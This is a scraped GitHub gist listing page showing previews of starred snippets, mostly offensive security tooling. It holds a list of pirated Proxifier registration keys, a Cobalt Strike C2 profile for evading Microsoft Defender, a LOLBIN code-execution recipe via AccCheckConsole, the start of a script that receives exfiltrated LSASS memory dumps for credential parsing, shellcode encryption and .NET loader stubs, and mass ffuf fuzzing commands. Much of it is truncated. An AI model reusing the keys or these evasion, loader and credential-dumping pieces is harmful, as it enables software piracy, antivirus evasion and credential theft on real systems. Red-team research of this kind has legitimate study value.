Skip to content

Instantly share code, notes, and snippets.

View Blazz3's full-sized avatar

Blazz3

64 followers · 267 following
View GitHub Profile
@montasim
montasim / Proxifier v4 Registration Keys.txt
Last active May 7, 2026 06:55
KFZUS-F3JGV-T95Y7-BXGAS-5NHHP
T3ZWQ-P2738-3FJWS-YE7HT-6NA3K
KFZUS-F3JGV-T95Y7-BXGAS-5NHHP
65Z2L-P36BY-YWJYC-TMJZL-YDZ2S
SFZHH-2Y246-Z483L-EU92B-LNYUA
GSZVS-5W4WA-T9F2E-L3XUX-68473
FTZ8A-R3CP8-AVHYW-KKRMQ-SYDLS
Q3ZWN-QWLZG-32G22-SCJXZ-9B5S4
DAZPH-G39D3-R4QY7-9PVAY-VQ6BU
KLZ5G-X37YY-65ZYN-EUSV7-WPPBS
@olliencc
olliencc / AA.cpp
Last active February 27, 2025 02:36
Enumerates why each DLL loaded for each process via PEB
/*
This was the first version - the newer version also includes *When* it was loaded also.
https://gist.github.com/olliencc/e166a64ca211c51eb69111f26ce57bc1
*/
@bohops
bohops / AccCheckConsole.txt
Last active February 28, 2024 19:15
AccChecker LOLBIN [AccCheckConsole.exe]
*Purpose
- UI Accessibility Checker
- Verifies UI accessibility requirements
*LOLBIN Functionality/Steps
1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
2) Add proper assembly references (e.g. AccCheck.dll)
3) Insert your C# code under a target method such as Execute()
4) Compile to a .NET managed library (DLL)
5) Invoke the code
@olliencc
olliencc / MEMGUARD.cpp
Created December 27, 2021 21:11
//
// MEMGUARD.cpp : Simulate a process we want to dump
//
// Dump early with MEMGUARDDump then
// - strings.exe memguard.dmp | findstr HiLo
// HiLo - %d
//
// Dump later with MEMGUARDDump then
// -
// HiLo - %d
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2025 09:08
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@aufzayed
aufzayed / haklist.sh
Created November 8, 2021 00:21
# the required tools
# subjs -> https://github.com/lc/subjs
# js-beautify -> https://github.com/beautify-web/js-beautify
# haklistgen -> https://github.com/hakluke/haklistgen
haklist() {
# declare TMPDIR variable
TMPDIR="/tmp/haklist"
@snovvcrash
snovvcrash / GetZip.py
Last active November 5, 2025 12:31
Exfiltrate LSASS dump over TCP
#!/usr/bin/env python3
# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz
import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser
@jackullrich
jackullrich / mainc.c
Last active May 23, 2025 21:29
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@ChoiSG
ChoiSG / rsrcDecryptAssembly.nim
Last active September 19, 2022 17:31
embed .net, decrypt, load and execute in nim poc
import nimcrypto
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy
#[
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t
nimble install winim nimcrypto zippy
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.
@remonsec
remonsec / MASS-FUZZ
Last active October 18, 2024 03:52
FFUF command for fuzzing over multiple host
===[ Start Fuzzing ]===
ffuf -w common.txt:FUZZ -w ~/bb/target/httpx.txt:URL -u URLFUZZ -mc 200 -of csv -o ffuf-result.txt
===[ See The Result ]===
cat ffuf-result.txt | awk -F ',' '{print $3}'
N.B: My wordlist have '/' at beginning
Example: /.git
If your wordlist start with '.git'